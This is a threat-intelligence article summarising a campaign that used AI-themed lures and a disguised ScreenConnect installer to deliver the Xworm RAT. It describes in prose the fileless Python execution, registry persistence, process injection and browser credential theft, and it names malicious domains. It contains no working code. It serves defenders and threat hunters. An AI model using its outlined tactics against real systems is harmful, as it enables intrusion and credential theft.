Malicious ScreenConnect Campaign Abuses AI-Themed Lures for Xworm Delivery
Trustwave’s SpiderLabs Threat Hunt team recently uncovered a malicious campaign that used AI-themed lures to deliver the Xworm RAT. The attackers exploited fake AI content to trick users into downloading a ScreenConnect installer, which initiated a multi-stage infection. This campaign highlights how cybercriminals use the growing interest in AI to bypass traditional security defenses.
The attackers employed social engineering tactics like phishing, malvertising, and fake social media posts to convince users to download the malicious installer. One case involved luring a victim to a fake AI website, gtpgrok.ai, which redirected them to the malicious site anhemvn6.com.
Initial Access and Execution
The ScreenConnect installer was disguised as a legitimate file named “Creation_Made_By_GrokAI.mp4 Grok.com”. However, an analysis revealed it was actually ScreenConnect.ClientSetup.msi. The attackers manipulated the digital signature of the file using Authenticode to hide the malware’s true purpose. Once downloaded, the installer connected to a ScreenConnect server controlled by the attackers. The malicious ScreenConnect client ran in the background without visible indicators, allowing attackers to access the victim’s system remotely.
Malicious Payload and Execution Chain
During the remote session, the attackers executed a file called X-META Firebase_crypted.bat, which downloaded a zip archive named 5btc.zip from anhemvn4.com. The archive contained a renamed pythonw.exe file (renamed to pw.exe) that executed a Base64-encoded command. The command, once decoded, attempted to launch additional payloads from a GitHub repository.
By using fileless execution, the attackers bypassed detection tools. The malicious Python code ran directly from the GitHub repository, which allowed the attackers to inject code into legitimate processes like chrome.exe and msedge.exe, keeping their actions hidden from the victim.
Persistence and Credential Access
The attackers added a persistence mechanism by modifying the system registry. A registry key was created to execute pythonw.exe every time the user logged in. This ensured that even after a reboot, the attackers maintained access to the system. The pythonw.exe file also ran encoded Python commands, which again connected to the same GitHub repository.
Additionally, the attackers used WMI queries to gather information about the operating system and installed antivirus software. pw.exe also targeted sensitive browser data, trying to access login credentials and session cookies from Google Chrome, Microsoft Edge, and Mozilla Firefox.
Ongoing Campaign and Response
This campaign shows how AI-themed lures can bypass EDR alerting systems, which failed to detect the malicious activities. Manual review of the timeline within Defender was required to identify the threats, emphasizing the value of human-driven threat hunting in modern cybersecurity.
The use of AI-themed content enabled the attackers to make their campaign more believable. This social engineering tactic increases the chances of successful infection, especially when combined with modified legitimate tools like ScreenConnect.
Conclusion
This investigation highlights the growing sophistication of cybercriminal campaigns. The attackers used AI-themed deception and bypassed automated defenses to launch a targeted and effective attack. The findings reinforce the importance of human expertise in threat hunting. While automated tools play a crucial role, they cannot replace the strategic value of skilled cybersecurity professionals who can spot evolving threats.
To stay ahead of the curve, organizations must invest in threat hunting and manual analysis to detect sophisticated attacks that bypass automated systems.
